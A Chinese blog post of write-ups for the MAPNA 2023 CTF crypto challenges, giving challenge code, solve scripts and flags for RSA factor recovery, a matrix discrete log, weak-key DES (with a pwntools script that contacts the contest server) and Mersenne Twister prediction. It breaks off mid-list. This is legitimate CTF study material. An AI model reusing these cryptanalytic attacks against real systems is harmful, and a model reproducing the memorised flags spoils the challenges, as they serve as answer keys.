[MAPNA 2023] crypto/pwn 部分

最新推荐文章于 2024-06-21 20:07:44 发布
最新推荐文章于 2024-06-21 20:07:44 发布
阅读量1k 收藏 23
点赞数 24
文章标签: windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52640415/article/details/135859000
版权

继续打结束的比赛,不紧张,完成以后也可以慢慢修下代码.

Crypto

Isogenies

同源加密,没弄明白,并且没搜到WP

Shibs

RSA加密,先生成一个素数p,然后循环左移s位得到素数q给出p&q

from Crypto.Util.number import *
from flag import flag

def shift(s, B):
	assert s < len(B)
	return B[s:] + B[:s]

def gen_key(nbit):
	while True:
		p = getPrime(nbit)
		B = bin(p)[2:]
		for s in range(1, nbit):
			q = int(shift(s, B), 2)
			if isPrime(q):
				n = p * q
				return n, p, s  #s可能很小

nbit = 1024
n, p, _ = gen_key(nbit)
q = n // p
dna = p & q
m = bytes_to_long(flag)
c = pow(m, 65537, n)

print(f'n = {n}')
print(f'dna = {dna}')
print(f'enc = {c}')

原先作过一道p&(q<<1)的题,以那个为模板作些修改

from Crypto.Util.number import *

n = 20316898932195904153277570911129808751568815578115203862825426326247688399447840960418077345063791379522152467572219078649052797300815169624324245983590614914067269781160218800744443132820786495383622657350005442865119235171347222481549171383138463856866590153226706585323109487068718209302113471433380661465050751463957327192775767168671487596946840993911799696944069759277414133632444513772210700794949276020219498655982617016744321984479076362225276288530893635176013522707993482886351558163399233902562390621254309853983712254751850630385079750216639722676398376824903099579116864460998259826947136455660974737633
dna = 112981924875557500958025001180130494828271302148393893025039250618449754880107262891213034570290994460680732065864408219699255537220809236513831561599199136870056419874815435027857448315805793914961273026882116413167515833581245087132919209478091324962372324771986076010340277554904109601589334046901209670673
enc = 3045339581292945711130813005351003100918522557110757541588006962379795819964889960982006172396478992403763951169397699477604011489683403206194674478676115307579754281253958928474112104087602753563505848223560038859380782692201785087834133116953880301903767021262497807797262966215767967235011554145888668721199447563741572273525508047234141844260401652933196055533764562153454963082569500478073362290691632890264262315099050876574517869170470080069161301450816555901477760392115210762498464643598219802952797283932722013302922244300834587051779128033516492433437534261890143822056118794447406885925957834712258842422
nbit = 1024

#test
'''
nbit = 128
n = 54806273471734426848076644605552636373334768906819576755734949055415399448617
p = 189996131273799767657828044014097273591
q = 288459944443574806693489336664825208287
dna = 180792125784322614120793611349623836887
sbit = 17
'''
maps = [int(i,2) for i in bin(dna)[2:]]

def check(v0,v1):
    for i in range(nbit):
        if v0[i]!='*' and v1[i]!='*' and int(v0[i])&int(v1[i]) != maps[i]:
            return False 
    else:
        return True

def add_check(v0,v1,ii,tp):
    lv0,lv1=list(v0),list(v1)
    for i in range(nbit):
        i2 = (i-sbit)%nbit
        j2 = (i+sbit)%nbit 
        if lv0[i] != lv1[i2]:
            if lv0[i] == '*': #*0 *1
                lv0[i] = lv1[i2]
            elif lv1[i2] == '*': #0* 1*
                lv1[i2] = lv0[i]
            else:  #10 01
                #print(f"{v0}\n{v1}\n{ii} 0 {i} {i2}\n")
                return [] 
        if lv1[i] != lv0[j2]:
            if lv1[i] == '*':
                lv1[i] = lv0[j2]
            elif lv0[j2] == '*':
                lv0[j2] = lv1[i]
            else:
                #print(f"{v0}\n{v1}\n{ii} 1 {i}\n")
                return []

    tmp = []
    if tp==0:  #上边
        lv0[ii] = '0'
        if check(lv0,lv1):
            tmp.append(''.join(lv0)+''.join(lv1))
        lv0[ii] = '1'
        if check(lv0,lv1):
            tmp.append(''.join(lv0)+''.join(lv1))
    else:
        lv1[ii] = '0'
        if check(lv0,lv1):
            tmp.append(''.join(lv0)+''.join(lv1))
        lv1[ii] = '1'
        if check(lv0,lv1):
            tmp.append(''.join(lv0)+''.join(lv1))
    #print(tmp)
    return tmp  
    
    
def get_v(sp,sq):
    queue = [''.join(sp)+''.join(sq)]
    while True:
        #print(len(queue))
        tmp = []
        if len(queue)==0:
            break
        for v in queue:
            #修剪
            v0,v1 = v[:nbit],v[nbit:]
            #print(''.join(v0)+'\n'+''.join(v1))
                                
            #print(len(v))
            sv10,sv20 = int(v0.replace('*','0'),2),int(v1.replace('*','0'),2)
            sv11,sv21 = int(v0.replace('*','1'),2),int(v1.replace('*','1'),2)
            if sv10*sv20 == n:
                print(f"p = {sv10}\nq = {sv20}")
                return 
            elif sv11*sv21 == n:
                print(f"p = {sv11}\nq = {sv21}")
                return 
            elif sv10*sv20>n:
                #print('exit 1', hex(sv10),hex(sv20), sv10*sv20)
                continue 
            elif sv11*sv21<n:
                #print('exit 2', hex(sv11),hex(sv21), sv11*sv21)
                continue 
            
            #print('In')
            tp = 2
            for i in range(nbit):
                if v0[i] == '*':
                    tp = 0
                    break 
                if v1[i] == '*':
                    tp = 1 
                    break 
            else:
                if int(v0,2)*int(v1,2) == n:
                    print('p = ', int(v0,2))
                    print('q = ', int(v1,2))
                    tmp = []
                    return
                continue  #queue next 

            #print("pos:",i)
            #   i
            # s .  | ...     ..
            # ...   |   s .  
            #             j
            tmp += add_check(v0,v1,i,tp)
        queue = tmp
    
for sbit in range(1,nbit//2):
    #print(sbit)
    sp = [i if i=='1' else '*' for i in bin(dna)[2:]]
    sq = sp[sbit:] + sp[:sbit]
    for i in range(nbit):
        if sp[i] == '1' and sq[i] == '*':
            if maps[i] == 1:
                sq[i] = '1'
            else:
                sq[i] = '0'
        if sp[i] == '*' and sq[i] == '1':
            if maps[i] == 1:
                sp[i] = '1'
            else:
                sp[i] = '0'
    #print(''.join(sp)+'\n'+''.join(sq))
    get_v(sp,sq)

p =  118627270647424424141514783307481285886258073029116821903046590278901771054287488093459396876753105609837026655906589077937738668295841155401318912730133481985678923364535216697903225159999957216575823849034786092435988869550296395479754426578068176634670446795305597283053006032071267819138579464710410086097
q =  171266681103878322117424575175361468379674209043813157946561665043786388947203228350875263109216690282197981858022233522587435146007011089350418152369819924630928608372164838867715907687708478655112024432448453837808032774893387899232268630799449237496392996637407630619155994281854191089804529710230573475089
long_to_bytes(pow(enc, inverse(65537,(p-1)*(q-1)), n))
#b'MAPNA{Br4nch_&_prun3_Or_4Nother_ApprOacH???}'

GLNQ

基于矩阵的DLP问题,但是以伽瓦罗域的形式给出的矩阵

from Crypto.Util.number import *
from flag import flag

F, k = GF(2**8), 14

while True:
	G = random_matrix(F, k)
	if G.is_invertible():
		break

flag = flag.lstrip(b'MAPNA{').rstrip(b'}')
m = bytes_to_long(flag)  #m = int(flag) 给的有问题
H = G ** m

print(f'G = {G}')
print(f'H = {H}')
G =[[            x^7 + x^6 + x^4 + x^3 + x^2,                               x^7 + x^6 + x^2,                               x^5 + x^4 + x^3,                                        x^3 + x,                        x^6 + x^5 + x^3 + x^2,                   x^5 + x^4 + x^3 + x^2 + x,               x^7 + x^6 + x^5 + x^3 + x + 1,                                      x^4 + x^3,                               x^7 + x^5 + x^4,                                 x^7 + x^2 + x,                          x^5 + x^4 + x^2 + x,               x^7 + x^6 + x^4 + x^3 + x + 1,                          x^7 + x^5 + x^3 + x,                    x^6 + x^4 + x^3 + x^2 + 1],
[                              x^7 + x^5 + x^4,                                 x^7 + x^3 + x,               x^7 + x^4 + x^3 + x^2 + x + 1,                               x^5 + x^4 + x^3,                   x^6 + x^4 + x^3 + x^2 + x,                                         x^4 + 1,                                    x^5 + x + 1,      x^7 + x^6 + x^5 + x^4 + x^3 + x^2 + 1,                             x^7 + x^6 + x + 1,                    x^7 + x^6 + x^5 + x^2 + 1,                          x^4 + x^3 + x^2 + x,                                      x^6 + x^2,                                      x^7 + x^6,                               x^7 + x^5 + x^4],
[                                 x^7 + x^4 + 1,                   x^5 + x^4 + x^3 + x^2 + x,                                    x^6 + x + 1,                           x^6 + x^3 + x^2 + 1,                    x^6 + x^4 + x^3 + x^2 + 1,                                               x,                      x^5 + x^3 + x^2 + x + 1,                   x^6 + x^5 + x^3 + x^2 + x,                        x^7 + x^5 + x^4 + x^3,                                      x^5 + x^2,                                    x^2 + x + 1,                               x^7 + x^6 + x^4,                    x^7 + x^5 + x^4 + x^2 + 1, x^7 + x^6 + x^5 + x^4 + x^3 + x^2 + x + 1],
[           x^7 + x^5 + x^4 + x^3 + x^2 + x,                   x^7 + x^6 + x^4 + x^2 + x,                           x^5 + x^3 + x^2 + 1,                          x^7 + x^5 + x^3 + x,                      x^6 + x^4 + x^3 + x + 1,                           x^7 + x^6 + x^2 + 1,                                      x^7 + x^2,                                  x^4 + x^3 + 1,               x^7 + x^6 + x^3 + x^2 + x + 1,               x^7 + x^4 + x^3 + x^2 + x + 1,                    x^7 + x^5 + x^4 + x^2 + 1,                          x^6 + x^4 + x^2 + x,        x^7 + x^5 + x^4 + x^3 + x^2 + x + 1,               x^7 + x^6 + x^3 + x^2 + x + 1],
[                  x^7 + x^5 + x^4 + x^2 + x,                   x^5 + x^4 + x^3 + x^2 + x,                                      x^5 + x^3,                      x^5 + x^4 + x^3 + x + 1,                               x^6 + x^5 + x^3,                        x^7 + x^6 + x^5 + x^2,                           x^7 + x^6 + x^2 + 1,                                    x^5 + x + 1,                                  x^4 + x^3 + 1,                                      x^6 + x^5,                      x^5 + x^3 + x^2 + x + 1,                   x^7 + x^6 + x^4 + x^3 + x,                                      x^7 + x^2,                   x^7 + x^6 + x^5 + x^3 + x],
[              x^7 + x^5 + x^3 + x^2 + x + 1,                        x^7 + x^6 + x^4 + x^3,                                      x^7 + x^4,                    x^7 + x^6 + x^5 + x^3 + 1,                                         x^5 + 1,                    x^7 + x^4 + x^3 + x^2 + 1,                        x^5 + x^4 + x^3 + x^2,                             x^7 + x^6 + x + 1,                                    x^2 + x + 1,                                      x^7 + x^2,                                             x^5,                          x^5 + x^4 + x^2 + x,                    x^7 + x^5 + x^3 + x^2 + 1,        x^7 + x^6 + x^5 + x^4 + x^3 + x + 1],
[                          x^6 + x^4 + x^3 + 1,                                         x^6 + 1,                      x^6 + x^4 + x^3 + x + 1,                          x^5 + x^4 + x^3 + x,                                  x^5 + x^4 + 1,                             x^7 + x^4 + x + 1,                             x^7 + x^6 + x + 1,                           x^6 + x^3 + x^2 + 1,                                  x^5 + x^2 + 1,                           x^5 + x^3 + x^2 + 1,                                                0,                   x^6 + x^4 + x^3 + x^2 + x,                        x^6 + x^4 + x^3 + x^2,                                  x^4 + x^2 + 1],
[                       x^7 + x^6 + x^4 + x^3,                          x^6 + x^3 + x^2 + x,                           x^7 + x^5 + x^2 + 1,                           x^7 + x^6 + x^2 + 1,                                 x^7 + x^6 + x,                                  x^6 + x^3 + 1,                   x^7 + x^6 + x^3 + x^2 + x,                      x^7 + x^5 + x^2 + x + 1,                      x^6 + x^4 + x^3 + x + 1,               x^7 + x^4 + x^3 + x^2 + x + 1,                                             x^5,                           x^7 + x^6 + x^4 + 1,                               x^6 + x^5 + x^4,                           x^7 + x^5 + x^4 + 1],
[                          x^7 + x^5 + x^2 + 1,                           x^6 + x^5 + x^2 + 1,               x^7 + x^6 + x^4 + x^2 + x + 1,                                  x^6 + x^5 + 1,                                  x^6 + x^4 + 1,                                                0,                 x^7 + x^6 + x^5 + x^4 + x^3,                           x^5 + x^4 + x^2 + 1,                        x^7 + x^6 + x^5 + x^3,                             x^5 + x^4 + x + 1,               x^7 + x^6 + x^4 + x^2 + x + 1,                                      x^6 + x^2,                               x^7 + x^6 + x^3,                                  x^4 + x^3 + 1],
[                              x^7 + x^6 + x^3,                                         x^7 + 1,                        x^6 + x^5 + x^4 + x^2,                           x^5 + x^4 + x^2 + 1,                      x^7 + x^6 + x^4 + x + 1, x^7 + x^6 + x^5 + x^4 + x^3 + x^2 + x + 1,                                      x^6 + x^3,                           x^7 + x^3 + x^2 + 1,                                               x,                      x^5 + x^4 + x^2 + x + 1,                      x^6 + x^5 + x^3 + x + 1,                        x^7 + x^6 + x^3 + x^2,                               x^5 + x^3 + x^2,                             x^5 + x^4 + x + 1],
[                                               0,                   x^6 + x^5 + x^4 + x^3 + x,        x^7 + x^5 + x^4 + x^3 + x^2 + x + 1,                 x^7 + x^6 + x^5 + x^4 + x^2,                             x^5 + x^3 + x + 1,                      x^7 + x^5 + x^4 + x + 1,                               x^7 + x^5 + x^4,        x^6 + x^5 + x^4 + x^3 + x^2 + x + 1,                    x^7 + x^6 + x^5 + x^2 + 1,                               x^5 + x^4 + x^3,        x^7 + x^6 + x^5 + x^3 + x^2 + x + 1,            x^7 + x^6 + x^4 + x^3 + x^2 + x,                                  x^7 + x^4 + 1,                    x^6 + x^5 + x^4 + x^2 + 1],
[                                       x^3 + x,                                         x^3 + 1,                             x^4 + x^3 + x + 1,                                  x^5 + x^3 + 1,                        x^7 + x^6 + x^5 + x^2,                   x^7 + x^6 + x^4 + x^2 + x,                          x^6 + x^5 + x^4 + x,                                         x^6 + 1,                   x^7 + x^6 + x^3 + x^2 + x,                               x^7 + x^3 + x^2,                                             x^4,                   x^6 + x^5 + x^4 + x^3 + x,                               x^6 + x^5 + x^2,                      x^5 + x^3 + x^2 + x + 1],
[            x^7 + x^6 + x^5 + x^3 + x^2 + 1,                                 x^7 + x^3 + x,                                             x^5,                          x^6 + x^5 + x^2 + x,        x^7 + x^6 + x^4 + x^3 + x^2 + x + 1, x^7 + x^6 + x^5 + x^4 + x^3 + x^2 + x + 1,                                 x^7 + x^4 + x,                      x^7 + x^5 + x^4 + x + 1,                             x^6 + x^4 + x + 1,             x^7 + x^6 + x^5 + x^4 + x^2 + 1,                          x^7 + x^6 + x^5 + x,                   x^7 + x^5 + x^3 + x^2 + x,               x^7 + x^6 + x^5 + x^2 + x + 1,               x^6 + x^5 + x^4 + x^3 + x + 1],
[                                 x^6 + x^4 + 1,                               x^6 + x^3 + x^2,                          x^6 + x^5 + x^3 + x,                 x^7 + x^6 + x^5 + x^3 + x^2,                               x^6 + x^5 + x^2,                    x^6 + x^5 + x^3 + x^2 + 1,                          x^6 + x^3 + x^2 + x,                             x^7 + x^3 + x + 1,               x^7 + x^4 + x^3 + x^2 + x + 1,                                    x^3 + x + 1,                               x^6 + x^4 + x^2,                                      x^7 + x^4,                   x^6 + x^5 + x^4 + x^2 + x,                    x^6 + x^5 + x^3 + x^2 + 1]]

H =[[               x^7 + x^3 + x^2 + 1 ,                          x^4 + x^3 + 1  ,                 x^6 + x^4 + x^3 + x,             x^6 + x^5 + x^4 + x^2 + 1,     x^7 + x^5 + x^4 + x^3 + x^2 + x,                                      x^6,                           x^4 + x^3 + 1,                 x^6 + x^5 + x^4 + x^3,                        x^6 + x^5 + x^3,                      x^7 + x^5 + x + 1,                   x^6 + x^4 + x^3 + x,            x^7 + x^6 + x^4 + x^3 + x,                   x^6 + x^4 + x^2 + x,        x^7 + x^6 + x^3 + x^2 + x + 1],
[                         x^6 + x^2 + x ,                  x^6 + x^5 + x^3 + x  ,               x^6 + x^5 + x^4 + x^2,                      x^7 + x^5 + x + 1,        x^7 + x^6 + x^5 + x^4 + x + 1,               x^6 + x^5 + x^2 + x + 1,                             x^7 + x + 1,                                  x^2 + 1,                               x^5 + x^2,   x^7 + x^6 + x^5 + x^4 + x^3 + x^2,                      x^5 + x^2 + x + 1,                      x^5 + x^2 + x + 1,             x^6 + x^5 + x^4 + x^2 + 1,                      x^7 + x^2 + x + 1],
[           x^6 + x^5 + x^4 + x^3 + x ,                     x^6 + x^4 + x + 1  ,                             x^7 + x^6,      x^7 + x^6 + x^4 + x^3 + x^2 + 1,                      x^5 + x^2 + x + 1,             x^7 + x^6 + x^4 + x^3 + 1,                 x^7 + x^6 + x^4 + x^2,                 x^5 + x^4 + x^3 + x^2,                                    x + 1,             x^6 + x^4 + x^3 + x^2 + 1,                                  x^2 + 1, x^7 + x^5 + x^4 + x^3 + x^2 + x + 1,                               x^7 + x^6,                           x^7 + x^3 + 1],
[                x^7 + x^4 + x^3 + x^2 ,     x^7 + x^6 + x^5 + x^4 + x^2 + 1  ,             x^7 + x^5 + x^2 + x + 1,                               x^3 + x^2,                        x^4 + x^3 + x^2,            x^5 + x^4 + x^3 + x^2 + x,                      x^7 + x^4 + x + 1,             x^7 + x^4 + x^3 + x^2 + 1,                                 x^4 + x, x^7 + x^6 + x^5 + x^4 + x^3 + x + 1,                        x^6 + x^5 + x^2,               x^7 + x^6 + x^3 + x + 1,               x^6 + x^4 + x^3 + x + 1,                          x^7 + x^3 + x],
[            x^7 + x^6 + x^5 + x^4 + 1 ,                   x^5 + x^3 + x^2 + 1  ,                               x^4 + x,                    x^6 + x^5 + x^4 + 1,                                      x^6,                    x^7 + x^5 + x^2 + 1,               x^7 + x^6 + x^2 + x + 1,            x^7 + x^5 + x^3 + x^2 + x,                      x^7 + x^3 + x + 1,                    x^7 + x^5 + x^3 + 1,                           x^7 + x^4 + 1,                   x^7 + x^4 + x^3 + x,                    x^6 + x^5 + x^4 + 1,                 x^6 + x^5 + x^4 + x^3],
[                   x^7 + x^4 + x^2 + 1 ,                              x^5 + x^3  ,        x^7 + x^6 + x^4 + x^3 + x^2,                          x^7 + x^4 + x,          x^7 + x^6 + x^4 + x^3 + x^2,                    x^5 + x^4 + x^3 + 1,                      x^3 + x^2 + x + 1,        x^6 + x^5 + x^4 + x^2 + x + 1,                                  x^6 + 1,                               x^3 + x^2,             x^7 + x^5 + x^4 + x^2 + 1,        x^7 + x^5 + x^4 + x^3 + x + 1,        x^5 + x^4 + x^3 + x^2 + x + 1, x^7 + x^6 + x^5 + x^3 + x^2 + x + 1],
[                       x^7 + x^6 + x^5 ,                       x^6 + x^5 + x^3  ,                 x^6 + x^5 + x^3 + x,                               x^5 + x^4,                   x^7 + x^5 + x^4 + x,                                      x^2,                                      x^6,                                  x^6 + 1,                 x^7 + x^5 + x^4 + x^3,                               x^7 + x^2,               x^7 + x^3 + x^2 + x + 1,      x^7 + x^6 + x^4 + x^3 + x^2 + 1,               x^7 + x^6 + x^2 + x + 1,        x^7 + x^6 + x^3 + x^2 + x + 1],
[                   x^7 + x^5 + x^3 + 1 ,              x^6 + x^3 + x^2 + x + 1  ,           x^6 + x^5 + x^3 + x^2 + 1,                      x^3 + x^2 + x + 1,                        x^7 + x^3 + x^2,                                      x^2,               x^6 + x^5 + x^4 + x + 1,                           x^3 + x^2 + 1, x^7 + x^6 + x^5 + x^4 + x^3 + x + 1,                               x^6 + x^3,                    x^7 + x^5 + x^4 + 1,                             x^4 + x + 1,                           x^5 + x^4 + 1,             x^5 + x^4 + x^3 + x^2 + 1],
[       x^7 + x^6 + x^4 + x^2 + x + 1 ,                         x^6 + x^3 + x  ,          x^6 + x^5 + x^3 + x^2 + x,                           x^4 + x^2 + 1,                               x^6 + x^2,                          x^6 + x^3 + x,                   x^6 + x^4 + x^3 + x,            x^5 + x^4 + x^3 + x^2 + x,                        x^7 + x^6 + x^2,                                  x^2 + 1,                        x^6 + x^5 + x^4,                    x^7 + x^6 + x^3 + 1,            x^7 + x^6 + x^5 + x^2 + x,                    x^7 + x^6 + x^3 + 1],
[                x^7 + x^6 + x^3 + x^2 ,                   x^7 + x^5 + x^3 + 1  ,                  x^7 + x^6 + x^3 + 1, x^7 + x^6 + x^4 + x^3 + x^2 + x + 1,                    x^4 + x^3 + x^2 + 1,                               x^7 + x^3,             x^6 + x^4 + x^3 + x^2 + 1,                             x^2 + x + 1,                 x^7 + x^6 + x^3 + x^2,                   x^6 + x^5 + x^3 + x,                        x^4 + x^3 + x^2, x^7 + x^6 + x^5 + x^4 + x^2 + x + 1,                      x^6 + x^2 + x + 1,        x^6 + x^5 + x^4 + x^3 + x + 1],
[                       x^7 + x^6 + x^5 ,     x^6 + x^5 + x^4 + x^3 + x^2 + 1  ,                  x^7 + x^5 + x^2 + 1,                                      x^3, x^7 + x^6 + x^5 + x^4 + x^2 + x + 1,             x^7 + x^4 + x^3 + x^2 + 1,                           x^7 + x^4 + 1,                 x^7 + x^5 + x^4 + x^2,                    x^4 + x^3 + x^2 + 1,     x^6 + x^5 + x^4 + x^3 + x^2 + x,            x^6 + x^4 + x^3 + x^2 + x,               x^7 + x^6 + x^2 + x + 1,             x^6 + x^4 + x^3 + x^2 + 1,                   x^5 + x^4 + x^2 + x],
[                                 x^3 + 1 ,                   x^7 + x^3 + x^2 + 1  ,             x^7 + x^6 + x^2 + x + 1,                             x^6 + x + 1,          x^7 + x^5 + x^4 + x^3 + x^2,                 x^7 + x^6 + x^5 + x^2,                          x^7 + x^3 + x, x^7 + x^6 + x^4 + x^3 + x^2 + x + 1,                          x^4 + x^3 + x,                                  x^7 + 1,               x^7 + x^5 + x^2 + x + 1,                               x^6 + x^2,                                  x^4 + 1,     x^7 + x^6 + x^5 + x^4 + x^3 + x],
[x^7 + x^6 + x^5 + x^3 + x^2 + x + 1 ,           x^7 + x^5 + x^4 + x^2 + x  ,                             x^7 + x^4,               x^5 + x^3 + x^2 + x + 1,                               x^6 + x^4,                               x^6 + x^2,                    x^7 + x^6 + x^2 + 1,                   x^7 + x^6 + x^2 + x,               x^5 + x^4 + x^2 + x + 1,                               x^6 + x^3,        x^7 + x^4 + x^3 + x^2 + x + 1,        x^7 + x^6 + x^5 + x^3 + x + 1,                                         0,                           x^7 + x^3 + 1],
[                  x^6 + x^5 + x^2 + x ,                          x^3 + x^2 + 1  ,                 x^5 + x^4 + x^2 + x,                   x^6 + x^4 + x^2 + x,      x^7 + x^6 + x^5 + x^4 + x^3 + 1,        x^7 + x^6 + x^4 + x^2 + x + 1,                    x^7 + x^6 + x^2 + 1,                      x^6 + x^2 + x + 1,      x^7 + x^6 + x^5 + x^4 + x^3 + 1,                   x^7 + x^6 + x^2 + x,                    x^7 + x^5 + x^4 + 1,                                      x^6,                           x^4 + x^3 + 1,                          x^6 + x^3 + x]]

 经问师傅,得到两种生成矩阵的方法

#方法1
R = GF(2^8)
G = matrix(GF(2^8),14)
G[i,j] = R('z8^3 + 1')

#方法2
R = GF(2^8)
z8 = R.gen()
G = matrix([[z8^3+1,...],...])

然后还得到解法,在sagemath 10.0,discrete_log函数可以一个带算法参数的algorithm='lambda'

可以直接使用网上在线求 Sage Cell Server

if G.is_invertible():
    m = discrete_log(H, G,algorithm='lambda')
    assert H==G**m, 'not-yet'
    print(m)
else:
    print('no')

#6424379811053277573417442136
#MAPNA{6424379811053277573417442136}

 不过题目的bytes_to_long似乎是int,根据网上的WP确实不需要long_to_bytes回去.

Be Fast🏃

远程用DES进行加密,密钥由用户输入,一共14个,最后一个加上循环左移一位重复7次加上后7个密钥一共生成21个密码,再用这些密码对数据进行加密,要求在短时间内根据密文求出明文.

#!/usr/bin/env python3

from random import *
from binascii import *
from Crypto.Cipher import DES
from signal import *
import sys, os
from flag import flag

def die(*args):
	pr(*args)
	quit()

def pr(*args):
	s = " ".join(map(str, args))
	sys.stdout.write(s + "\n")
	sys.stdout.flush()

def sc():
	return sys.stdin.buffer.readline()

def shift(msg, l):
	assert l < len(msg)
	return msg[l:] + msg[:l]

def pad(text):
	if len(text) % 8 != 0:
		text += (b'\xff' * (8 - len(text) % 8))
	return text

def encrypt(msg, key):
	msg = pad(msg)
	assert len(msg) % 8 == 0
	assert len(key) == 8
	des = DES.new(key, DES.MODE_ECB)
	enc = des.encrypt(msg)
	return enc

def main():
	border = "+"
	pr(border*72)
	pr(border, ".::        Hi all, you should be fast, I mean super fact!!       ::.", border)
	pr(border, "You should send twenty 8-byte keys to encrypt the secret message and", border)
	pr(border, "just decrypt the ciphertext to get the flag, Are you ready to start?", border)
	pr(border*72)

	secret_msg = b'TOP_SECRET:' + os.urandom(40)
	
	cnt, STEP, KEYS = 0, 14, []
	md = 1

	while True:
		pr(border, "please send your key as hex: ")
		alarm(md + 1)
		ans = sc().decode().strip()
		alarm(0)
		try:
			key = unhexlify(ans)
			if len(key) == 8 and key not in KEYS:
				KEYS += [key]
				cnt += 1
			else:
				die(border, 'Kidding me!? Bye!!')
		except:
			die(border, 'Your key is not valid! Bye!!')
		if len(KEYS) == STEP:
			print(KEYS)
			HKEY = KEYS[:7]
			shuffle(HKEY)
			NKEY = KEYS[-7:]
			shuffle(NKEY)
			for h in HKEY: NKEY = [key, shift(key, 1)] + NKEY  #[A,shift_A]*7 + [xxx]
			enc = encrypt(secret_msg, NKEY[0])
			for key in NKEY[1:]:
				enc = encrypt(enc, key)
			pr(border, f'enc = {hexlify(enc)}')
			pr(border, f'Can you guess the secret message? ')
			alarm(md + 1)
			msg = sc().strip()
			alarm(0)
			if msg == hexlify(secret_msg):
				die(border, f'Congrats, you deserve the flag: {flag}')
			else:
				die(border, f'Sorry, your input is incorrect! Bye!!')

if __name__ == '__main__':
	main()

由于循环左移一字节当输入相同的8字符时与原密钥相同,并且DES是8字节块加密,所以可以用已知固定的头和密钥的全排列生成字典,通过密文查字典得到正确的密钥顺序现解密.

import itertools
from Crypto.Cipher import DES

def encrypt(enc,keys):
    for v in keys:
        des = DES.new((v*8).encode(), DES.MODE_ECB)
        enc = des.encrypt(enc)
    return enc

def decrypt(enc,keys):
    for v in keys:
        des = DES.new((v*8).encode(), DES.MODE_ECB)
        enc = des.decrypt(enc)
    return enc

enc0 = b'TOP_SECR'

dic = {}
key = '1234567'
for v in itertools.permutations(key):
    t1 = '7'*14+''.join(v)
    v2 = encrypt(enc0,t1)
    dic[v2.hex()] = t1
    #print(v2.hex(),t1)

print('-'*20)
print('Total:', len(dic))


#-----------------------
#输入的key
from pwn import *

p = remote('3.75.180.117', 37773)
context.log_level = 'debug'
v = 'abcdefg1234567'

for i in v:
    p.sendlineafter(b'+ please send your key as hex: \n', (i*8).encode().hex().encode())

p.recvuntil(b"+ enc = b'")
enc = p.recvline().strip()[:-1].decode()
key = dic[enc[:16]]
print(enc[:16], key, enc)
msg = decrypt(bytes.fromhex(enc), key[::-1])
print(msg)

p.sendlineafter(b'+ Can you guess the secret message? \n', msg[:-5].hex().encode())
p.recvline()
p.recvline()
p.interactive()

#enc = '379cfa337a483e0a9073efdb0b424b501a29f9cdaf3c2e709303a006f61665bf27aa29d282614aa19c3485389eb9ea5172962bb7a9e2ad37'
#MAPNA{DES_h4s_A_f3W_5pec1f!c_kEys_7eRm3d_we4K_k3Ys_And_Sem1-wE4k_KeY5!}

What next?

这题是个热身题,本意是一个梅森旋转求随机数,但是一不小心给了结果,直接异或即可,正式题是下一个.

What next II?

给了79个256位随机数,可以恢复state,然后求下几个再异或求明文.

这比赛很怪,第1题巨难几乎无人能解,然后越来越简单

#!/usr/bin/env python3

from random import *
from Crypto.Util.number import *
from flag import flag

def encrypt(msg, KEY):
	m = bytes_to_long(msg)
	c = KEY ^ m
	return c

n = 80
TMP = [getrandbits(256) * _ ** 2 for _ in range(n)]
KEY = sum([getrandbits(256 >> _) ** 2 for _ in range(8)]) 

enc = encrypt(flag, KEY)

print(f'TMP = {TMP}')
print(f'enc = {enc}')

用那个库直接求

TMP = [0, 22330693840234311255135949029444484409546667648719176405826663892267656641027, 127168478027482847709328807841325386271927515479937061237117195618823278578116, 182258311374053859620888699680212168010665323374548870180038645090147843867373, 1120044041165490856498692287111236626472260308631093314161690677868431277653536, 1983473421395194676263973602935227753154638099492341714205203280778040675593450, 1574768551732085861078069762534699936995654652684634077104498873387111232412816, 4988773041677976257517254491234335651753610239922582254283447205154548743632904, 869738033317159039287197189670964123964466628318970710545560734535418094431872, 716771557072892076589368879721160406613516964478389692662921907034616035095047, 2841054733362182186252458286741823726277405165099408732758691872324732479956600, 6200268989316199565071790593244237980113705529543497656127585449937778556282311, 10670728743047162087774896911955052588177734200772863764402582886370432879158720, 7713906922622752752151916696524419287963819641354815269293605765422900017233866, 13689077681405838115291939958594572280593102467042881661528817316126253635857444, 23677404931618939684375357302211056316481456538100460743428412550112769975941300, 22334702277647520331031971258896634990832479997228972554803329027443498276011264, 24695994670269108821474844143270568317378271123560130717104045624895774803117988, 10726839246587772223823222881528936091917884797218227418638385365176143122217812, 1312747277711228023681888222399668996816715931126782050057534166588569071642948, 14829434912751138825019062212374862054511849430113519894438429231649766515851600, 4917180643387964007287001238070594020985844865025196727991425387470641537875518, 50772176246766546694026388399540445347088279634906123947563600159509306535585300, 20680598744337311676861190641592800456437920078216405214477640693225317242487078, 57560623230262776939750106414721715686651269149245752162663251361023294801081600, 63941301709699592129851769466238327968731332723117779339939586823464299930335000, 30248094445348087425063737332624900285689080519537666953907462011122884602991780, 9774708715683840095021685805936771586028623975773332766526807054152590972465402, 61228751294246951869891671407294469506401133460669313068369993608651062307301536, 41981261972157910420555352577742115252749734931422260886610665615142932761250238, 92332289648534120255700799585162857690611895814212622902006472593032842219422300, 102090694836612045964656351247645673041342905792690679450732518780700786595757872, 8465306744686231379969736050689382339949995071265316552433666241539252681451520, 114072153081233359084524715014825650254537286682603109151986752844288607088786066, 39946361462751138749261511325777846481011288953117931061771127396007551287911208, 51243479474799144289518571031495536096625532453885999576052634625243425716758700, 132356504405092579871543186323238530972479261975470487510352508943760068475015440, 109077835346013498228568867183016137777644328620298812835459712256002833220195417, 52635267919343130972014005273289555808336337947193348140410148289978267235415648, 9568343438735227407132147420705807168258684366618511035784505242511446472528193, 136103745592722122037143341370556407561964415802887285393102934361453911394982400, 15501324115571167305412632833471884183641743683875758176471163573103721210677697, 124579054262159655532164017523017564697199759561416452868759873217906475930663652, 69331433672201876294056448428159828327113921951663941374636039203754564050923557, 134825790087045765574290263555594553874136924161813224135475519279020442040026864, 127098236196925756090074171499128508507461799729629969599917408442298996799214250, 120716315173788627251671396349879537684221828425501013413665864262612928100844788, 246230945837378885729579613348413794121875158206606559652651668292953179058653508, 182436930868427241575608788617950343128628563937798409868187047670441481734494464, 2216307326510769061988701188806623458793041637834505792592287312459658319545700, 217778196427604121810125555838576095983026719310491477185297193068203986197977500, 200042153662024093707446037685450040433674498805614787040971237961725493946807124, 55096521527758008435839474651130444687406648424301616531387151625485823586357376, 